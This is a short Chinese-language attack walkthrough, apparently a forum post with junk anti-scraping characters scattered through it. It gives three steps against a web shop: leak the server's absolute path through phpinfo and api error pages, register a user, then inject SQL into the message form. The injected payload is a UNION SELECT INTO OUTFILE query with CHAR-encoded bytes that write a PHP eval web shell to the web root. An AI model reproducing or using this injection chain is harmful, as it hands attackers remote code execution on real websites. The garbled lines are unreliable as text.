第一个:想办法找到目标网站的绝对路径
( y2 O/ L+ Z0 q8 r* F1 C2 [" h6 ]3 n4 a; @" O/ G
http://www.political-security.com/install/svinfo.php?phpinfo=true
1 v: N' M: `/ n. a; z6 \' ?" M D( n! Y- O
http:/www.political-security.com/core/api/shop_api.php' l- @6 m+ @8 {' C" o" p% L
) t4 `* Q% {& l# n9 ~
http://www.political-security.co ... api_b2b_2_0_cat.php9 R' ^0 ?9 a, b9 A2 V% Z
) v1 j5 M3 @0 K# l# k
http://www.political-security.com/core/ap ... b_2_0_goodstype.php% y" G% A7 c c$ g( C, S) \
) _5 ]2 L, s3 I3 d/ f
http://www.political-security.co ... i_b2b_2_0_brand.php3 R+ k4 \# V0 \. k/ N
第二个:注册一个普通用户
8 I4 S/ x: s! v+ R" [( A$ y9 w' f. y2 U6 g
http://www.political-security.com/?passport-signup.html
( g; R* x, N4 F
/ r$ D$ p9 l' n- t* h+ s/ A( ]% Y( r( y第三个: 发送消息
) W7 Q1 b$ S& B) w( l
5 W, m+ V9 s# v- O$ L/ L: @http://www.political-security.com/?member-send.html
1 U3 a8 R4 A1 z+ [发送给中填写1 f5 w. y" K( \0 E7 k' K" {+ T8 \
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |